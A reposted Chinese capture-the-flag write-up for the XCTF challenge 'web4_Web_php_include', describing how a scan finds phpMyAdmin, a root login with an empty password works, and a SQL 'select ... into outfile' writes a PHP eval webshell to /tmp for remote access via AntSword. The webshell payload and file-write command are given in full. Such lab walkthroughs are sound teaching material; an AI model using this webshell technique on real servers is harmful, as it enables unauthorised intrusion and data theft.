【XCTF高手进阶区】web4_Web_php_include writeup（三）

2025-03-04 09:31:43 阅读次数：1

web4_Web_php_include

原题链接

key:SQL注入+一句话木马

此题其他解法👇

XCTF高手进阶区 web4_Web_php_include writeup（一）

XCTF高手进阶区 web4_Web_php_include writeup（二）

XCTF高手进阶区 web4_Web_php_include writeup（四）

①又双叒叕是这道题，不过这一次我们我们用一个更加风骚的解法

老话说得好，如果没思路了就去扫描一下👇

【XCTF高手进阶区】web4_Web_php_include writeup（三）

扫描发现了phpmyadmin后台👆

②双击它进入登录页面

【XCTF高手进阶区】web4_Web_php_include writeup（三）

username为root，password为空，登录👇

【XCTF高手进阶区】web4_Web_php_include writeup（三）

③进入SQL语句输入的地方

先输入并执行如下SQL语句👇

show variables like "secure_file_priv"

【XCTF高手进阶区】web4_Web_php_include writeup（三）

phpmyadmin变量secure_file_priv值为空，说明可以写入一句话木马

④编辑一句话木马并执行

select "<?php eval($_POST['shell']); ?>"into outfile '/tmp/Mitchell.php'

【XCTF高手进阶区】web4_Web_php_include writeup（三）

传🐎成功

为什么传🐎的目录是tmp

⑤用蚁剑连接👇

【XCTF高手进阶区】web4_Web_php_include writeup（三）

一眼就找到了flag文件👇

【XCTF高手进阶区】web4_Web_php_include writeup（三）

版权声明：本文内容来自第三方投稿或授权转载，原文地址：https://blog.csdn.net/Mitchell_Donovan/article/details/113286024，作者：Mitch311，版权归原作者所有。本网站转在其作品的目的在于传递更多信息，不拥有版权，亦不承担相应法律责任。如因作品内容、版权等问题需要同本网站联系，请发邮件至ctyunbbs@chinatelecom.cn沟通。

上一篇：【树状数组】1649. 通过指令创建有序数组

推荐标签

作者介绍

天翼云小翼

天翼云用户

文章

30504

阅读量

4289691

活动

应用商城

合作伙伴

开发者

支持与服务

了解天翼云

【XCTF高手进阶区】web4_Web_php_include writeup（三）

【XCTF高手进阶区】web4_Web_php_include writeup（三）

web4_Web_php_include

相关文章

【XCTF高手进阶区】web4_Web_php_include writeup（二）

MySQL数据库设计规范

MYSQL库的操作（如果想知道MYSQL中有关库的操作的知识，那么只看这一篇就足够了！）

C++去除string里的引号

leetcode刷题（python解题）-----9.回文数

JavaWeb前端常用的代码复用总结

python 提取出sql语句中where的值

探索基于WebAssembly的下一代前端性能优化方案

用WebGPU实现现代Web3D渲染——突破传统性能瓶颈的解决方案

初始MYSQL数据库（6）—— 事务

作者介绍

最新文章

【XCTF高手进阶区】web4_Web_php_include writeup（二）

python 提取出sql语句中where的值

用WebGPU实现现代Web3D渲染——突破传统性能瓶颈的解决方案

Linux——信号

beanstalk mariuswilms/beanstalk辅助php操作beanstalk

ORA-04089: 无法对 SYS 拥有的对象创建触发器

热门文章

nginx和fastcgi的两种通信方式

怎样启用Microsoft Web Office

SQL Server中的临时表

thinkphp验证码实现。

MariaDB 单表查询与聚合查询

linux篇-linux LAMP yum版安装

热门标签

相关产品

弹性云主机

天翼云电脑（公众版）

对象存储

云硬盘

随机文章

php 快速读取文件夹下文件列表

【XCTF高手进阶区】web4_Web_php_include writeup（二）

使用php将数组转为XML

MariaDB 单表查询与聚合查询

SQL Server索引基础

网安研发之初识抽象语法树